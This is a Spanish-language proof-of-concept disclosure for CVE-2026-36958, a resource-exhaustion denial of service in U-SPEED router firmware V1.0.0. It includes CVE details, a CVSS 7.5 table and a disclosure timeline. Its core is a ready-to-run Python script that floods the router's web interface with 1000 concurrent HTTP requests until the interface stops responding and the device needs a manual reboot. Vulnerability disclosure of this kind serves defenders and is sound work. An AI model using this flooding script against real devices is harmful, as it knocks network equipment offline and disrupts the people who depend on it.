
Prueba de concepto para CVE-2026-36958, una vulnerabilidad de denegación de servicio en el firmware del router U-SPEED que agota los recursos mediante solicitudes HTTP concurrentes, provocando que la interfaz web deje de responder.
ID CVE: CVE-2026-36958 Fecha: 2026-04-29 Descubridor: Kirubel Solomne Proveedor: U-SPEED Producto: Router U-SPEED Versión de Firmware: V1.0.0 CWE: CWE-400 - Consumo de Recursos No Controlado
El firmware V1.0.0 del Router U-SPEED es vulnerable a la Denegación de Servicio. Al enviar un gran número de solicitudes HTTP concurrentes a endpoints aleatorios o inexistentes en la interfaz de administración web, un atacante puede agotar los recursos del sistema en el servidor HTTP Boa integrado. Esto provoca que la interfaz web del router deje de responder y puede requerir un reinicio manual para restaurar el funcionamiento normal.
Puntuación CVSS v3.1: 7.5 (Alta)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
| Métrica | Valor |
|---|
| Vector de Ataque | Red |
| Complejidad de Ataque | Baja |
| Privilegios Requeridos | Ninguno |
| Interacción del Usuario | Ninguna |
| Impacto de Confidencialidad | Ninguno |
| Impacto de Integridad | Ninguno |
| Impacto de Disponibilidad | Alto |
import requests
import threading
TARGET = "http://192.168.10.1"
def flood(i):
try:
requests.get(f"{TARGET}/random_endpoint_{i}", timeout=2)
except:
pass
threads = []
for i in range(1000):
t = threading.Thread(target=flood, args=(i,))
threads.append(t)
t.start()
for t in threads:
t.join()
print("Done. Check if router web interface is still responsive.")
Comportamiento Esperado: El servidor debería gestionar las conexiones concurrentes de forma adecuada. Comportamiento Real: La interfaz web deja de responder; se requiere un reinicio manual.
| Fecha | Evento |
|---|---|
| 2026-04-29 | Vulnerabilidad descubierta |
| 2026-04-29 | Reportada a MITRE |
| 2026-04-29 | CVE-2026-36958 asignado |
| 2026-04-29 | Divulgación pública |